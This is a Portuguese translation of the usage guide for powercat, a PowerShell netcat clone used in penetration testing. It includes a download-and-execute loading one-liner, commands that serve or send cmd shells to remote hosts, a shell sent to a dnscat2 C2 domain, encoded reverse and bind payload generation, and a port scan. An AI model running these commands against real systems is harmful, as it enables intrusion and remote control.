
netshell inclui todos os recursos na versão 2 do powershell
Netcat: A versão powershell. (PowerShell Versão 2 e Posteriores Suportadas)
powercat é uma função do powershell. Primeiro, você precisa carregar a função antes de executá-la. Você pode colocar um dos comandos abaixo no seu perfil do powershell para que o powercat seja carregado automaticamente quando o powershell iniciar.
Carregar a Função a partir do Arquivo .ps1 Baixado:
. .\powercat.ps1
Carregar a Função a partir de URL:
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')
-l Escutar por uma conexão. [Switch]
-c Conectar a um listener. [String]
-p A porta para conectar ou escutar. [String]
-e Executar. (GAPING_SECURITY_HOLE) [String]
-ep Executar PowerShell. [Switch]
-r Retransmissor. Formato: "-r tcp:10.1.1.1:443" [String]
-u Transferir dados via UDP. [Switch]
-dns Transferir dados via DNS (dnscat2). [String]
-dnsft Limite de falhas DNS. [int32]
-t Opção de timeout. Padrão: 60 [int32]
-i Entrada: Caminho do arquivo (string), array de bytes ou string. [object]
-o Tipo de saída no console: "Host", "Bytes" ou "String" [String]
-of Caminho do arquivo de saída. [String]
-d Desconectar após conectar. [Switch]
-rep Repetidor. Reiniciar após desconectar. [Switch]
-g Gerar Payload. [Switch]
-ge Gerar Payload Codificado. [Switch]
-h Exibir a mensagem de ajuda. [Switch]
Por padrão, o powercat lê a entrada do console e escreve a entrada no console usando write-host. Você pode alterar o tipo de saída para 'Bytes' ou 'String' com -o.
Cliente Básico:
powercat -c 10.1.1.1 -p 443
Listener Básico:
powercat -l -p 8000
Cliente Básico, Saída como Bytes:
powercat -c 10.1.1.1 -p 443 -o Bytes
O powercat pode ser usado para transferir arquivos de ida e volta usando -i (Entrada) e -of (Arquivo de Saída).
Enviar Arquivo:
powercat -c 10.1.1.1 -p 443 -i C:\inputfile
Receber Arquivo:
powercat -l -p 8000 -of C:\inputfile
O powercat pode ser usado para enviar e servir shells. Especifique um executável para -e, ou use -ep para executar o powershell.
Servir um shell cmd:
powercat -l -p 443 -e cmd
Enviar um shell cmd:
powercat -c 10.1.1.1 -p 443 -e cmd
Servir um shell que executa comandos powershell:
powercat -l -p 443 -ep
O powercat suporta mais do que enviar dados via TCP. Especifique -u para ativar o Modo UDP. Os dados também podem ser enviados para um servidor dnscat2 com -dns. Certifique-se de adicionar "-e open --no-cache" ao executar o servidor dnscat2.
Enviar Dados Via UDP:
powercat -c 10.1.1.1 -p 8000 -u
powercat -l -p 8000 -u
Conectar ao servidor dnscat2 c2.example.com usando o servidor DNS em 10.1.1.1:
powercat -c 10.1.1.1 -p 53 -dns c2.example.com
Enviar um shell ao servidor dnscat2 c2.example.com usando o servidor DNS padrão do Windows:
powercat -dns c2.example.com -e cmd
Os retransmissores no powercat funcionam como os retransmissores tradicionais do netcat, mas você não precisa criar um arquivo ou iniciar um segundo processo. Você também pode retransmitir dados entre conexões de diferentes protocolos.
Retransmissor de Listener TCP para Cliente TCP:
powercat -l -p 8000 -r tcp:10.1.1.16:443
Retransmissor de Listener TCP para Cliente UDP:
powercat -l -p 8000 -r udp:10.1.1.16:53
Retransmissor de Listener TCP para Cliente DNS:
powercat -l -p 8000 -r dns:10.1.1.1:53:c2.example.com
Retransmissor de Listener TCP para Cliente DNS usando o Servidor DNS Padrão do Windows:
powercat -l -p 8000 -r dns:::c2.example.com
Retransmissor de Cliente para Cliente:
powercat -c 10.1.1.1 -p 9000 -r tcp:10.1.1.16:443
Retransmissor de Listener para Listener:
powercat -l -p 8000 -r tcp:9000
Payloads que executam uma ação específica podem ser gerados usando -g (Gerar Payload) e -ge (Gerar Payload Codificado). Payloads codificados podem ser executados com powershell -E. Você pode usá-los se não quiser usar todo o powercat.
Gerar um payload tcp reverso que se conecta de volta a 10.1.1.15 porta 443:
powercat -c 10.1.1.15 -p 443 -e cmd -g
Gerar um comando tcp bind codificado que escuta na porta 8000:
powercat -l -p 8000 -e cmd -ge
O powercat também pode ser usado para realizar varreduras de portas e iniciar servidores persistentes.
Scanner TCP Básico de Portas:
(21,22,80,443) | % {powercat -c 10.1.1.10 -p $_ -t 1 -Verbose -d}
Iniciar um Servidor Persistente que Serve um Arquivo:
powercat -l -p 443 -i C:\inputfile -rep